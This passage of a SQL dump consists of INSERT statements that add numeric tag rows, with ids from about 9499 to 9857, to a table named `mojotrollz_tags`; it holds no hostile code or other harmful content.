'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9499, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9499, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9500, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9500, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9500, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9501, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9502, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9502, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9502, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9503, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9503, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9503, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9516, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9516, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9517, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9518, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9520, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9520, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9521, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9522, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9525, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9525, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9526, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9528, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9528, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9529, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9529, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9536, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9536, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9537, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9538, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9540, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9540, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9541, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9542, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9543, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9543, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9543, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9544, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9545, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9545, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9547, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9547, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9548, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9549, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9550, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9551, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9552, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9554, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9554, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9554, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9555, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9558, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9558, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9558, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9558, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9559, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9560, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9561, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9562, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9563, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9564, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9564, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9564, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9564, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9566, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9566, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9566, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9568, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9568, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9568, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9583, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9583, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9583, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9584, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9584, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9596, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9596, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9596, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9600, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9601, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9602, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9602, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9604, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9604, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9616, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9618, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9618, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9619, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9619, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9620, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9621, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9622, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9622, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9623, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9623, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9636, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9660, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9676, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9676, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9677, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9677, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9677, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9678, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9678, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9678, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9679, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9679, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9679, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9680, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9680, 1, 2, 25, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9680, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9681, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9681, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9681, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9682, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9690, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9691, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9691, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9692, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9692, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9692, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9693, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9693, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9693, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9694, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9695, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9696, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9696, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9697, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9699, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9700, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9700, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9706, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9716, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9716, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9716, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9717, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9717, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9717, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9718, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9736, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9736, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9736, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9776, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9777, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9778, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9779, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9796, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9796, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9816, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9816, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9816, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9817, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9817, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9817, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9818, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9818, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9818, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9819, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9819, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9819, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9836, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9856, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9856, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9856, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9856, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9856, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9857, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9857, 1, 30, 